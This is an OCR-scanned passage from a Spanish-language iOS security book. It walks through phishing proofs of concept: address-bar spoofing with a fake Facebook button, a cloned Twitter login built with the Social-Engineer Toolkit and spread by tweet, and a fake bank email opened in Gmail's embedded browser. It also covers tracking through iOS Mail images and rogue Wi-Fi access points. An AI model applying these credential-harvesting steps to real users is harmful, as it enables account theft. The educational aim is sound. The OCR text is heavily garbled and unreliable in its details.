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-  Creación  del  tichero  que  se  encardará  de,  mediante  !a  utilización  de  tm  botón,  invocar 
a  la  naeva  ventana  con  el  sitio  web  falso  y  la  banti  de  direcciones  spoofeada.  Este  ftcliero 
puede  ser  alojado  en  un  servidor  propio  dcí  atacante,  con  dominio  en  In teme L  para  no  levantar 
sospecha,  o  si  el  atacante  tiene  acceso  a  algún  servidor,  por  así  decirio  de  alguna  marca 
reconocida  en  Internet,  aprovecharía  esto  para  ganar  la  conñanza  de  las  victimas. 

-  En  esta  prueba  de  concepto  se  utilizará  un  botón  de  Facebook^  el  cual  tras  ser  pulsado 
desde  el  dispositivo  ¡OS,  iFhom  en  este  caso,  abrirá  un  sitio  web  falso  preparado  para  recoger 
los  logln  de  Facehook.  La  ¡dea  es  presentar  a  la  victima  que  cuando  pulse  sobre  el  botón 
típico  de  compartir  en  Facebook^  se  abrirá  en  sii  dispositiv^o  una  ventana  que  le  pedirá  las 
credenciales,  como  si  la  sesión  hubiera  caducado.  Este  sitio  es  táiso,  aunque  en  la  barra  de 
direccioncíí  indicará  que  es  Facehook.  Hay  que  recordar  que  la  versión  de  iOS  será  una  5.L 

-  Una  vez  se  presenta  el  sitio  web  falso  a  la  víctima,  si  esta  dispone  de  un  ¡OS 5.  i  su  barra 
de  direcciones  liabii  sido  spoqfeada^  si  por  el  contmrio  dispone  de  una  versión  superior  la 
barra  de  direcciones  aparecerá  vacía.  En  cualquiera  de  los  dos  casos,  las  posibilidades  de 
éxito  son  altas  en  un  posible  ataque  de phishmg  real. 

En  la  siguiente  imagen  se  puede  visualizar  el  botón  de  "'Me  gusta*"  de  Facebook.  Este  botón  no  es 
exactamente  el  mismo  botón,  es  una  copia  y  esta  personalizado  para  que  cuando  se  haga  click  sobre 
él  se  ejecitre  la  ftmción  JavaScnpi  explicada  en  este  mismíi  capítulo. 


tma^cti  Ü9.Ü6:  Botón  talso  que  activará  phishmg  y  barspoqfing. 

Una  vez  las  víctimas  pulsan  sobre  el  lx)tón  se  abre  una  nueva  ventana  con  la  que  aparecerá  un  iframe 
que  ocupa  la  pantalla  o  la  mayor  parte  de  visión  posible.  La  página  interior  es  una  copia  preparada, 
incluso  con  conexión  a  baxe  de  datos,  dcl  propio  WAMP,  para  almacenar  las  credenciales.  En  esta 
iinagen  no  se  visualiza  ningún  mensaje,  como  en  la  prueba  de  concepto  original,  oslaría  preparado  el 
pliishirig  para  engañar  lo  mejor  posible  a  la  víctima.  La  barra  de  direcciones  es  spoofeada  indicando 
la  dirección  que  se  indique  en  el  JavaScript. 
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Ims^n  09h'ü  7-^  cua  iu  leonká  iiddni^  bar  ^poofin^ 

Para  comprobar  que  realTuenic  cm  un  iframe  y  que  no  se  encuentra  realmente  en  dicho  dominio  se 
puede  visualizar  la  siguiente  imagen.  Se  puede  comprobar  como  la  prueba  de  concepto  original  ha 
sido  modlñcada  para  mostrar^  en  este  instante,  nn  mensaje  que  indica  que  el  sitio  web  de  ahajo  es 
falso. 


Imagen  09, OS;  debajo  áa  la  líijt;a  que  iüformaqua  ^s^phirhmg. 
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5.  Herramientas  que  ayudan  a  la  ingeniería  social 

Ln  la  App  Store  exislcii  gran  cantidad  de  herramientas  que,  muinscienremente,  avaidan  a  realizar 
üabajos  áephishing.  ¿Esto  es  permitido  por  Apple?  Realmente  la  flmcioiialidad  de  la  aplicación  es 
otra,  pero  un  atacante  puede  útil  izarla  para  reaEzar  un  phishing  bastante  aceptable.  Además,  con  la 
a^-Tida  de  SET,  Social-Engineer  Toolkit,  se  puede  automatizar  el  proceso  de phishing  sin  necesidad 
de  configurar  entornos  más  avanzados  o  más  complejos. 

Las  aplicaciones  que  pueden  aTOdar,  y  mucho,  al  phíshing  en  dispositivos  ¿05 con  las  que  permiten 
la  aparición  de  navegadores  einhebidos.  Estas  aplicaciones  intenlan  mostrar  una  presentación  de 
unidad  y  gran  presencia  sin  contar  con  el  peligro  que  puede  suponer  para  el  usuario  final.  Corno 
ejemplo  se  hablará  más  delante  de  la  aplicación  de  Twitt&r  para  ¡05  con  la  que  los  nsuarios  pueden 
abrir  los  enlaces  de  los  Tvíeeta  en  la  propia  aplicación  gracias  a  la  clase  UIWehEicw.  Esta  clase 
despliega  la  inlormación  web  embebida  en  la  aplicación  sin  necesidad  de  salir  de  la  misma,  en  otras 
palabras,  el  usuario  puede  ver  la  información  en  la  aplicación  sin  abril'  el  navegador  Safari.  Esta 
clase  está  basada  en  Safari  pero  no  requiere  cerrar  la  aplicación  para  que  los  contenidos  se  muestren, 

¿Dónde  reside  el  problema  de  estos  navegadores  embebidos?  Fs  realmente  sencillo,  su  barra  de 
direcciones.  La  barra  de  direcciones  no  es  mostrada  por  lo  que  el  usuario  no  puede  ver  a  simple  vista 
si  el  sitio  que  accede  es  reaímeiiLc  cl  que  parece.  No  es  un  addresx  bar  spaojing.  ya.  que  es  el  propio 
compon enentc  UfWehView  el  que  trabaja  así  pordcíccto.  Como  solución,  se  indica  cl  sitio  web  al 
que  se  accede  en  la  barra  del  titulo  de  la  aplicación,  pero  esto  sucede  durante  un  breve  periodo  de 
Tiempo,  Después  aparece  en  la  barra  de  título  de  ia  aplicación  el  nombre  del  sitio  web,  el  cual  puede 
ser  fácilmerile  manipulado. 

En  la  siguiente  imagen  se  puede  visualizar  como  al  abrir  un  Iwk  de  mi  Tweei  se  puede  obtener  la 
página  sin  barra  de  dirección  asociada,  por  lo  que  no  se  puede  saber  si  cl  sitio  es  verdadero  o  no.  Otra 
dificultad  para  los  usuarios  es  que  Icishortner  de  direcciones  IJRI, se  encuentran  muy  difundidos  en 
Twiíier,  haciendo  ver  qué  el  envió  de  un  link  con  .shortner  en  l'witter  es  un  hecho  normal. 


liiragen  09,09:  NíivegaJor  web  era  bebido  en  Tn^itter  de  m  sitio  moví]. 
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SET:  Social-Engineer  Toolkit 

Es  un  script  que  proporcio-na  al  atacante  un  conjunto  de  lieiramieiitas  relacionadas  en  su  totalidad 
coii  la  ¡ngeiiiería  social,  liste  conjunto  de  herramicnLas  se  iuLcgra  fácilmeate  con  Metaspíoit  para 
obLcner  incluso  sesiones  inversas,  es  decir,  ia  intrusión  a  los  sistemas  remotos  que  se  csláu  atacando- 


lista  toolkit  ofrece  n  n  que  centraliza  todas  las  funcionalidades  necesarias  para  realizar  ingeniería 

social  a  través  de  medios  telemáticos.  Se  puede  decir  que  es  piratería  de  la  mente  humana.  El  objetivo 
de  SET  es  uLilizar  la  ingeniería  social  en  todas  las  vías  telemáticas  desde  el  engafin  medíante  SMS, 
hasta  la  suplantación  de  páginas  web.  pasando  por  la  ingeniería  social  en  dispositivos  ñsicos. 

Muchos  especialistas  opinan  que  la  in  gen  lena  social  es  un  gran  riesgo  en  la  actualidad.  Aunque 
día  a  día  las  pemonas  van  estando  más  concienciadas,  las  técnicas  de  ingeniería  social  avanzan  y 
los  métnd[>s  son  eada  vez  más  complejos.  Los  dispositivos  móviles  son  un  nuevo  foco  en  el  que  el 
engaño  puede  ser  hecho  con  bastante  facilidad  y  SET  ayudaiá  a  estas  pruebas  de  concepto  que  se 
prcsonlaíi  en  este  capítulo. 

Select  froín  the  mcriui 

1.  Spear-Phisíiing  AlLatk  Vcclors 

2.  tfebsite  Mtack  VecLors 

3.  Infectious  Media  OeneraUr 

4.  c reate  a  Payload  and-LisLeijej 

5.  Mass  Mailer  Attack 

6.  Tsensy  USB  HIO  Attack  Vector 

7.  SMS  Sponflng  Attack  Vector 

s.  y^ireleü*;  Access  Point  Attack  Vector 

9.  Third  Party  Me dales 

10.  Upíiate  the  Hetasploit  Framewürk 

11.  üpdate  the  Soci al-Enqineer  Toolkit 

12.  Help,  Credits,  and  About 

13.  Exit  the  Social-Engineer  Toolkit 

Enter  yaur  chnice:  2 


inatí^ii  09.1 1:  Meciú  SET. 
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Para  la  prueba  de  concepto  ac  utilizará  SET,  el  cual  se  encuentra  en  la  distribución  de  GNU/Linux 
para  auditoría  de  seguridad  BackTrack  5.  SET  se  cneucntra  disponible  en  la  siguiente  nita,  en  una 
distribución  BarkTrack  Jí,  /peníesl/exploits/seí. 


6.  PoC:  Hacking  con  Twitter 

En  esUi  prueba  de  concepto  se  utilizará  SFT  para  realizar  un  clon  del  í^ílío  web  de  Jmiiei'  con  el 
objetivo  de  disponer  en  un  servidor  o  una  mácpiina  local  de  un  inieio  de  sesión  falso  de  esta  web. 


Para  llevar  a  cabo  esta  acción  se  debe  an'ancai  SET  y  se  útil  izará  la  técnica  deiioiriinada  hm^esting 
de  ciedeiicinloM. -Fsta  técnica  permite  al  atacante  montar  un  sitio  web  similar  al  real  con  el  objetivo 
de  recolectar  las  credenciales  de  la  víctima.  Para  esta  prueba  de  concepto  se  parte  del  si  guien  Le 
escenario: 

-  Alaeante  con  una  máquina  BackTrack  5  con  un  senador  tveb  el  cual  facilitará  el  sitio  falso 
a  las  víctimas. 

-  La  víctima  recibirá  un  l\veet  a  naves  de  Tmiícr  con  un  acortad o^^el  cual  al  resolverse 

mostrará  en  la  aplicación  un  navegador  embebido  con  el  sitio  web  Tal  so.  La  víctima  no 
visualizará  ningún  dominio  eí  tiirección  iP  extraña,  por  lo  que  no  perderá  la  conñanza  en  lo 
que  está  viendo. 

Para  engañar  a  la  víctiina,  cuando  esta  acceda  a  ejecutar  el  iínk  llegará  a  un  sitio  wdb  de 
inicio  de  sesión  de  Twlner,  como  si  la  sesión  hubiera  caducado. 

A  continuación  se  procede  a  realizar  la  configui ación  del  servidor  para  clonar  el  inicio  de  sesión 
Ele  Jwitter.  En  piiiiiet  lugar,  tras  ejecutar  SET,  se  debe  elegir  la  Ofpcióii  dos  dcl  menú  principal 
deiioniinada  ^'WehsiTe.  Attctck  Vectors  "i 


Selcct  fran  tlie  menu^ 

i.  Spcar-Fhisliing  Ottack  Meclurs 
Z.  lJeh.s.ite  Attack  Uectars 
3.  ÍTiftciious  riediia  Grinfiratar 
á,  Create  rt  Pewjload  rtíid  Li^tcne? 

Hoss  lid  i  1er  nttack 

6.  Tcensg  USB  HID  Attack  Meutor 

7.  ShtS  Sppüfing  úttack  Uector 

B.  Uircless  ñenfiss  Foint  fittduK  Mcctor 
9-  Thírd  Farty  Muduics 

10.  Upddte  tJie  Metaí^iplnii  Franewurk 

11.  Updatíí  the  Spuidl-EngíTiccr  Tool  kit 

12.  Help,  CreditSi  and  Ahniit 

13.  Exit  the  Social-Engiiietír  Toolklt 

Erticr  gour  choicf^:  2 


imagen  09.12:  Elfeccióij  disl  de  lí taque  web  eti  SFT. 
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Tras  elegir  el  vector  de  ataque  hay  que  elegir  la  téenica  que  se  utilizará.  En  este  caso  se  pulsará  la 
opción  n limen >  Lres.  deiioniiuado  '"Credential  Harve^er  Attack  MÉthúd'\ 

En  esta  técnica  se  pedirá  si  se  quiere  uhWzsn:  una  plantilla  de  las  que  proporciona  SET  o  utilizar  un 
clonado  in  sihí  de  un  sitio  web.  Cabe  destacar  que  SET  es  capaz  de  realizar  una  copia  de  un  sitio 
web^  aunque  esta  esté  bajo  SSL. 

ni  Ufílisite  attack  Ucetars  I! i 

I.  Ueb  TRnp lates. 

£.  Site  Clonar 

J.  Guatón  Inport 

1.  Eetuni  Lo  siain  raenu 

Enter  Bunber  It  ^3: _ 

Jjnagsn  09 J 3:  Hiccción  dt?  clunuciúii  de  sillo  web 

En  este  ejemplo  la  dirección  IP  del  si  lio  clonado  éS  192  J  68.0. 61,  por  lo  que  en  el  iink  que  se  enviará 
por  Twítter  apuntaría  a  esa  dirección  IP.  El  envío  del  Twee^í  debe  ser  lo  más  natural  posible  para  que 
el  mayor  iiáiiiero  de  usuarios  tengan  la  confianza  para  acceder  a  dicha  URL.  Se  puede  utilizar  los 
hoshtags  para  llegar  al  mayor  numero  de  usuarios  posibles. 


SinS'- 

\nk-\ír  Twé^t 


□  forenaic 

#[otensiííM 

@victíraa_.i64_ipliüiie  Mira  tu  futu 
del  ün  de  remana  pasado!  bitly/ 
hKFggK 

^  t3-  ★  •••  S 


Imagen  09.14:  Kcccpeiun  de  Lwe^l  iiialieioso 

El  usuario  tras  recibir  el  Trvefí  puede  abrúio  o  no  abrirlo.  Este  hecEo  dependerá  de  la  eoTifiunza 
que  le  suscite  el  mensaje.  Este  es  el  momento  de  la  ingeniería  social  más  imaginativa.  Este  es  iin 
aLaque  que  lia  permitido  el  robo  de  credenciales  de  famosos,  gracias  a  las  nuevas  tecnologías  y  el 
desconocimiento  de  éstas. 


Sin  blfct  -í*  .lias 

Twwt  http://txo/NspX... 

üf 

1  _ 1 

imagen  Ü9.1:>:  Apertuni  dtíl  iiLivegf-doi'  eml'íehidn 


Se  puede  visualizar  como  al  abrir  el  link  se  muestra  el  navegador  embebido  en  la  aplieación  y  en  la 
barra  de  titulo  se  muestra  la  dirección  URT ..  Esta  dirección  IIRL  que  se  muestra  está  acortada,  por  lo 
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que  lio  levantará  síjspechas  en  los  usuarios  víctimas.  Sq  ha  uti libado  acción, 

pero  se  puede  utilizar  otros  shortnen:  con  el  mismo  resultado  positivo. 


Tras  la  carga  del  sitio  web  la  barra  dcl  título  solo  indica  Twitter.  por  lo  que  el  usuario  no  sospecliaría 
ninguna  acción  maliciosa.  La  página  que  se  muestra  es  la  del  íogm^  por  lo  que  la  victima  puede 
suponer  que  se  ha  caducado  la  sesión  y  debe  introduciT  sus  credenciales. 

Se  ha  suplantado  el  sitio  web  normal,  el  que  no  se  encuentra  optimizado  para  sitios  móviles.  Se 
podría  haber  suplantado  el  sitio  web  móvil  de  Twiíier  o  incluyo  realizar  un  sitio  web  que  iínile  al 
inicio  de  susión  en  la  aplicajción.  Con  estos  ulli trios  retoques  se  habría  conseguí tlí>  más  realismo  del 
que  ya  desprende. 

192 . IbS  . 0 . 157  -  t¿M.-"Dec/2012  11:35:46]  "GET  /  HITP/1.1"  2M  - 

[*J  UE  GDI  ñ  HITf  Frintiiiy  tJie  Dutput:  - 

POSS I  BLE  USEfíHñnE  F  lELD  FÍIUHD :  sess  ion  Eus-ei-  rifiLnc_Dr_erfta  i  11 =U  i  ct  i  ntó 
FUSIBLE  PASSHOKD  FIELD  FGUMU:  sesEÍon[pas.':yordl-123dlíc . 

PARAU :  ^cribc_loBf= 

POSSTBTJ:  USERtWriE  riEL»  FUUMD:  redlT‘ñr.t_after  lagíu-/ 

FfiRAd:  üuthentícitjj_token=c0f3S9<i60ba99032ab2¿ca22na3f9re34Sl43d-l 
r^T  UHEN  VEaJR  nrflSHED.  HIT  COHTmiT.-C  TÜ  GEHEEATE  ñ  KEfÜRT 

Imagen  09,1  7:  Crédenciíiles  lecogiÜus  ÚQip/mhmg 

En  esta  imagen  se  puede  visualizar  como  La  víctima  hace  clíc  stjbrc  el  Unk  y  accede,  desde  el 
navegador  embebido,  al  sitio  falso  de  Twitter,  Adetnás,  la  víctima  introduce  las  credenciales  que  sí>n 
almacenadas  por  SE  f  en  el  mismo  insLantc. 
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7.P0C:  Hacking  con  Gmail 

En  esta  prueba  de  concepto  se  utilizaiá  la  aplicación  de  Cmaii  para  íC?5  para  realizar  un  phishmg. 
Tal  y  coTní>  se  ha  explicado  en  la  prueba  de  concepUí  am  Twiüer^  la  aplicueidu  de  Gmcill  realiza  una 
operativa  similar  al  embeber  el  navegador  dentro  de  la  propia  aplicación. 

La  transición  que  se  explicará  entre  el  correo  recibido  en  la  aplicación  de  Gmai!  y  el  navegador 
embebido  uo  refleja  ningLin  dato  o  sospecha  sobre  la  página  que  realinenle  se  puede  visualizan  Es 
por  esta  i'azón  que  este  tipo  de  aplicaciones  es  un  blanco  sencillo  para  oí  phíiKkmg^  ya  que  ayudarán 
juás  al  atacante  que  al  usuario  víctima  del  suceso. 

La  idea  a  realizar  en  esta  pi  ueba  de  concepto  es  enviai  un  correo,  ya  puede  ser  masivo  en  busca  de 
gran  cantidad  de  víctimas,  con  el  que  nn  usuario  reciba  un  Imk  que  al  abrirlo  le  redirija  a  la  página 
de  auteíiticación  de  Gmail.  De  este  modo  el  usuario  pensará  que  la  sesión  se  le  ha  caducado.  Pero  es 
muebo  más  común  r^c\h\r phL\'hf.ng  baricario  en  el  correo,  el  cual,  y  gracias  a  la  ijnplenientación  de 
la  aplicación,  no  levantará  sospecha  si  está  realmente  cuidado  en  su  estética. 

En  primer  lugar  se  utilizará  SET  de  nuevo  para  preparar  un  sitio  web  clonado  del  inicio  de  un  banco 
CLialquiem.  Se  uíilizaiá  el  sitio  Fakt:  Mailer  p^m  myítX!:  correds  electrónicos  con 

este  sitio  web  es  sencillo  y  rápido  el  procesti  de  en  vft j  do  córreos  electrónicos  falsos  y  íacilnierilé 
pei^onalizables. 


Imtigen  09.  IS:  Cuntiu  ypaoft'rujfií  |>fií;a  el  phl'^hrng. 
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l  ¡wd  vl:/  en  vÍMtlí.)  el  carreo  y  de  tener  preparado  SUJ  con  el  sitio  web  clonado  y  preparado  para  recibir 
la  pcticidn  de  las  victimas  habrá  que  espeiai  a  que  éstas  caigan  on  el  phishmg  que  se  ha  creado. 
El  correo  electrónico  debe  ser  k>  más  creíble  posible,  inclnso  siendo  interesante  la  posibilidad  de 
incorporar  inriágcnes  que  puedan  proporcionar  confianza  a  ía  víctima  de  que  realiiieiite  el  correo  es 
real. 

En  la  siguiente  imagen  se  puede  visualizar  eí>mo  el  correo  que  llega  tiene  el  dominio  bancoMalícioso^ 
siendo  este  cambiado  en  un  caso  real  por  la  entidad  que  se  quiera.  Si  el  correo  electrónico  es  lo  ruás 
real  posible,  existe  gran  cantidad  de  posibilidades  de  que  no  se  considere  spenn  y  llegue  a  la  bandeja 
de  entrada  del  usuario. 


Innagcn  Ü9.19:  Acqcso  al  sitio  web  falso  ún  barra  de  diTeccianeí; 


En  la  parte  derecha  de  la  imagen  se  puede  visualizar  tras  pulsar  sobre  el  link  incorporado  en  el  mail 
http:/y7h7yüIü^xom/bancoAIalicioso.  se  accede  al  sitio  web  montado  ct)n  SRT. 

JmyUIlL  es  un  shartner  realmente  interesante  ya  que,  coirio  se  ha  visto  en  la  imagen  anterior,  permite 
creaz’  los  llnks  de  manera  personalizada,  siempre  y  cuando  el  nombre  esté  disponible.  De  este  modo 
se  puede  personalizar  aim  más  el  correo  y  la  trampa  que  se  propone  al  usuaiio. 


8.P0C:  Hacking  con  Facebook 

Como  se  ha  ido  observando  a  lo  largo  del  capítulo,  las  aplicticiones  más  famosas.  Lanío  de  redes 
sociales  o  gestión  de  correo  personal;  son  vulnerables  a  ingeniería  social.  Hacen  realmente  sencillo 
que  un  usuario  cualquiera  caiga  en  un phishmg^  independienfemente  del  nivel  de  este  nsuario. 
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La  aplicación  de  Fuüebook  no  se  queda  atrás  e  irrifilerTieriLa  también  el  misiníi  fallo  de  seguridad 
que  se  ha  estudiado  en  las  pniebas  de  concepto  anieriores.  Como  se  puede  visualizar  en  la  siguiente 
imagen,  cuando  un  usuano  pulsa  sobre  un  iink  que  alguien  depositó  en  su  aiurOj  se  abre  la  vista 
embebida  del  navegador,  de  nuevo,  sin  la  barra  de  direcciones. 


«Elisia  ■  CoinelilBr 


£77 1131 


►reooni&nda  -jn  artóouJo 

El  da  a  ■  lí 


AqiilmvwiifB 


^  mmm^ndo 


1  M  !■  1 1  W  ■ 

gua©  da  slí  prag^macíón.,.1 


RTVE  y  Clretecü  se  umsi 
«poyar  Ea  íHuil^án  yi  k  pfómiiclú.^ 

FTTd'E.M 


gLisia  >  ComeRfair 


£;*  04 


rtvees 


AlB'LdKh  I  niiüilbwiü  J  |  T4<ltbiñ*7in  Br¡ J  M.4 


Nsisí  4v  !  D»¥iirRK 


RTVE  y  Cineteca  se  unen  para  ap 
la  promoción  de  los  documéntale 


La  sala  de  cine  ubicada  en  Mati 


íjiiagtfii  ÍI9JZ0:  Ntivegadür  ^mbcbidu  en  havebí?ok  sin  lü  barra  de  diicc ciernes 


El  problema  radica  en  el  UlWeb  Vww.  Este  componente  de  desarrollo  no  iiiiplejneiita  la  bmra  de 
direcciones,  por  lo  que  es  un  problema  de  seguridad.  Esta  situación  ocurre  de  manera  similar  con 
el  eompíjnente  equivalente  en  la  plataforma  Andwíd,  por  lo  que  este  tipo  de  ataques  se  extiende  a 
dicha  plataforma. 


9.  El  correo  electrónico  en  iOS 

El  cliente  de  correa  electrónico  que  viene  por  detecto  en  el  sistema  operativo  iOS  dispone  de  una 
configuración  predeteioiiiiada  que  peniiite  la  carga  de  imágenes  en  mensajes  de  eorreo  eleetrónieo 
recibidos  en  formato  HTML, 

Esta  característica  pemiite  a  un  atacante  que  envíe  itn  mensaje  de  correo  electrónico  personalizado 
cargar  una  imagen  desde  una  URL  que  apunte  a  un  servidor  conlroiado.  En  otras  palabras,  cuando 
el  diente  de  correo  Maíl  intente  recuperar  toda  la  infonnación  del  mensaje,  realizará  una  petición 
H nP  al  sen^idor  donde  se  enlaza  la  imagen.  En  este  servidor  preparado  se  recogerá  infbnnacióo 
sensible  como  se  especifica  a  continuación: 
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Dirección  IF  desde  la.  que  la.  víeLiynii  se  eíieucnrra  corectada,  Est^  dirección  puede 
utilizarse  para  geolocaiizar  ñ\  usuario  y  averignar  su  ubicación  física. 

Versión  de  iOól  El  iiitbnnará  en  el  seiTidor  malicioso  configurado  que 

versión  del  sis  le  nía  í>pcralivo  de  iPhoneJiPad/iPod  Tonch  se  está  ejecutando,  además  de  la 
compilación  del  motor  wehkit, 

-  El  operador  de  comunicación.  Si  el  cliente  de  correo  electrónico  se  conecta  a  InterncL  a 
través  de  una  operadora  GPRS/^G.  el  a  tac  ante  ptídrá  conocer  cuál  es  la  cempafiía  de  este. 
La  dirección  IP  que  se  registrará  en  la  petición  pertenecerá  a  un  operador  de  comunicaciones 
concreto. 

Es  realmente  interesante  entender  como  enviaiido  un  correo  en  fonrmlo  HTML  c  in seriándole  los 
lints'  que  se  quieran,  es  decir,  un  poco  de  personalización  del  correo,  se  puede  engañar  al  cliente 
ívíall.  Cuando  el  cliente  intente  recuperar  al  contenido  de  esos  ¡inh  realizará  peticiones  a  los  sitios 
del  liípeí'v  íoculo^  con  lo  que  se  recogerá  infonnaeióii  en  mi  servidor  preparado  para  eláv 

Cabe  destacar  que  se  puede  conseguir  que  un  dispositivo  i  OS  realice  peticiones  a  nn  seivddor  de 
explolts  preparado  con  algún  expíoit  para  verificar  la  seguridad  del  teinimal,  por  lo  que  esta  técnica 
es  una  vector  de  ataque  muy  interesante  en  el  tipo  dhnt-slde  aiiack  para  lOS. 

Además,  este  tipo  de  téciiiea  y  eomporlamienlo  podría  ser  utilizado  para  forzar  a  la  \ictima  del 
mail  a  realizar  peticiones  que  puedan  resultar  ser  ataques  contra  sistemas  vulnerables*  Por  ejemplo, 
realizar  peticiones  a  vaiiabl es  de  un  sitio  web  que  puedan  ser  vulnenibles  'á  SOL  Injection.,  tal  y  como 
se  puede  visualizar  en  la  imagen. 


LrJtagen  09.2  L :  Pcíicíón  en  H  J  ML  BjjtjuuUidu.  por  ei  eliciití;  Mait 

Los  dispositivos  de  Apple  anteriores  al  íPhone  3GS  no -dispone  o  de  soporte  por  lo  que  serán 
vulnerables  siempre  a  este  tipo  de  ataques  cMeiit-síde. 


10.  Mobile  PwnlOwn 


Los  exploiís  no  abundan  en  el  mundo  de  los  dispositivos  móviles,  por  ello,  cuando  se  publica  alguno 
se  crea  gran  expectación.  Existe  un  mercado  en  eí  que  se  mueven  grandes  ciñ'as  económicas,  que 
buscan  estos  expioiís  para  dispositivos  móviles.  En  Anisterdam  se  celebra  una  popular  eornpcLición 
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denominada  F\vn20wn.  En  la  edición  de  2012  se  habló  de  nn  exploii  para  iOS  6  el  cual  medíante 
im  Clieiit  side  attack  se  podía  obtener  ciertos  datos  de  interés  del  dispositivo  de  nianera  consistente. 
Este  expío  it  afectaba  al  navegador  móvil  Safari  y  probablemente  Lambí  en  so  cnciicntrc  en  el  iPhone 


Este  expíolt  se  saltaba  el  código  fimiado  por  Apple  y  la  sandbox  de  Safari,  Lo  consiguieioii 
encaden  ando  distintas  técnicas  para  lograr  dicho  objetivo.  La  ejecución  del  exploit  provocaba  la 
obtención  íic  la  libreta  de  direcciones,  fotografías  del  usuario,  vídeos  qne  se  encontrasen  alojados  en 
el  temiinaf  el  historial  de  navegación. 

Este  expioit  podiía  ser  utilizado  para  realizar  miJaUbreak  al  dispositivo,  incluso  pata  el  íPhone  5. 
Los  creados  del  expioit  fuertin  Jaost  Pool  y  Daan  Keuper.  Estos  íIíis  investigadores  decidieron  no 
pnbiicai^  el  expioit  y  solo  realizarla  pmeba  de  concepto  en  este  evento.  Ademas,  decidieron  borrai  su 
trabajo  desliaciciulose  del  expioit  y  la  posibilidad  de  uLili/ar  dicho  expioit  para  realizar,  por  ejemplo, 
el  JaUhreak.  Este  hecho  hace  que,  posiblemente,  el  fallo  en  el  webkit  de  Safari  siga  existiendo,  pero 
el  expioit  que  se  aprovecha  de  dicha  tnilnerabilidad  ya  uo  existe. 

En  definitiva,  no  existe  un  gran  número  de  exploits  públicos  que  puedan  ayudar  a  kís  hackers  con 
menos  recursos  a  realizar  un  peníest,  pero  sí  que  existe  nn  mercado  donde  están  cotizados,  y  además, 
existen  hackers  que  tras  realizar  el  trabajo  más  diñcil  deciden  no  publicar;  ni  vender,  dicho  expioit. 
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Ataques  en  redes  Wi-Fi 


1.  Conexión  inalámbrica  en  iOS 

Los  dispositivos  iÚS  presentiin  varias  fonrras  de  cooectividad  íimlámbrica,  ya  sea  por  3G,  por 
Bluefoorh  o  por  Wireléss.  (en  adelante  Wl-Fi).  En  este  capítLilo  se  van  a  exponer  los  posibles  ataques 
que  se  puede  realizar  a  mi  dispositivo  íOS  a  travos  de  iiheí  conexión  Wi-Fi. 

Para  comenzar  se  van  a  explicar  unas  nociones  sobre  como  gestionan  dispositivos  IOS  las 
cüñcxiímcs  Wi-Fi.  Si  se  accede  al  panel  Afustes  >  Wi-Fi^  aparece  el  panel  de  configuración  de 
las  redes  Wi-Fi.  En  dicho  panel  se  pueden  realizar  las  típicas  tareas  de  configuración  y  gestión  de 
redes,  es  decir: 

Se  puüílc  activar/desactivar  la  conexión  Wi-Fk  lo  que  evidente  mente  permite  conectarse 
a  ima  red  Wí-I%  aunque  no  es  ese  el  llíiicü  motivo  para  conectarse  a  una  red  inalámbrica,  ya 
que  aumenta  la  precisióri  de  la  localización. 

-  Se  puede  visualizar  la  lista  de  redes  conocidas  a  las  que  el  disposlLivo  se  conecta 
automáticamente  (sin  pedir  coiitioiiacióii  al  usuaiío),  es  decir,  que  una  vez  que  el  usuario  se 
ha  conectado  a  una  red  Wi-Fk  ya  sea  abierta  o  con  contraseña  (se  introdujo  la  contraseña  la 
prii riera  vez  qiic  se  conecta  a  eilaj^  esta  red  queda  almacenada  en  la  lisia  de  conocidas,  y  a 
partir  de  ese  momento,  en  cuanto  la  red  está  al  alcance  del  dispositivo,  y  la  conexión  l¥i-Fi 
está  activada,  el  dispositivo  se  conectará  automáticamente. 

Por  ultimo,  existe  una  opción  para  que  el  dispositivo  pregunte  antes  de  conectarse,  en  el 
caso  de  que  haya  redes  al  alcance  y  estas  no  sean  conocidas. 

Teniendo  en  cuenta  el  funcionarmcnío  de  hs  conexiones  fñ'-Fí en  iOS]  se  puede  preparar  un  Ñogue 
AP  o  uu  punto  de  acceso  falso,  con  el  nombre  de  una  red  conocida  por  el  dispositivo^  de  manera 
se  conecte  automáticamente,  ial  y  como  se  ha  visto  anterioniiente.  Esto  da  lugar  a  una  variedad 
considerable  de  ataques  cíínfx:idos,  como  son  el  Mi'lM  o  Man  In  The  Aí/rMe,  kijacking  de  sesión, 
¡miffing,  etcétera , 

&  la  página  siguiente  se  pueden  ver  dos  imágenes  referentes  al  panel  de  administración  de  redes 
W¡-Fi  y  a  la  configuración  de  una  de  esas  redes. 
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Imagen  1 0.01 ;  Panal  <de  ajusies  en  iOS. 


Imagen  10.Ü2:  Cotifiguruci6n  de  la  red  Wírehss. 


La  conexión  de  los  dispositivos  y  los  Rogue  AP 

Existe  un  vector  de  ataque  clásico^  muy  cont)cidt),  y  que  en  el  HÍslcma  operativo  ¿OS  se  puede 
aprovechai.  Este  vector  de  ataque  es  ei  de  la  política  de  conexión  de  redes  Wlreless  conocidas,  el 
cLial  puede  dar  como  resaltado  un  ataque  de  tipo  Man  Iri  The  Middie  en  redes  W¡  Fi  por  medio  de 
un  Rogue  AP,  sinnulando  ser  la  red  "'habituar’  de  la  conexióiu  Además,  existen  una  serie  de  fallos 
de  imple  mentación  en  ia  gestión  de  las  conexiones  Wi-Ph  los  cuales  pueden  ayudar  a  un  alneauLc  a 
obtener  resultados  exitosos- 


bi  primer  fallo  que  se  conoce  es  la  lista  de  redes  couucidas.  Cabe  destacar  que  la  piimeJ’a  característica 
de  falta  de  seguridad  es  la  no  posibilidad  de  ver  qué  redes  contienen  la  lista  de  V/i-Fi  que  couoec  uu 
disptjsilivo  IOS.  Esta  lista  se  encuentra  almacenada  en  un  ñcliero  en  la  ruta  /prívate /\\ir/keychaim/ 
keychain-2.db,  el  cuí^l  no  puede  ser  visualizado  desde  uinguna  opción  del  dispositivo. 

La  única  manera  de  eliminar  una  red  conocida  es  encontrarse  en  el  radio  de  esta  y  ejecutar  la  opción 
'"olvidar  esta  red”.  La  opción  de  “Preguntar  al  conectar’^  solo  hace  referencia  a  nuevas  redes  y  no  a 
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Ids  redes  ya  conocidas  con  anLeriiiridad,  por  lo  que  seguirá  coriecLándose  de  iiiaiLera  automática  a  las 
redes  ya  conocidas. 


Tmafíen  KlO!?:  Opción  'Trej^untar  al  cnnectad’  en  ias  redes 

El  segundo  íálío  conocido  es  el  de  la  política  de  coneTíión  alas  redes  conocidas.  Rsíe  segundo  fallo 
de  seguridad  se  puede  explicar  ejempl jileando  el  siguiente  escenario: 

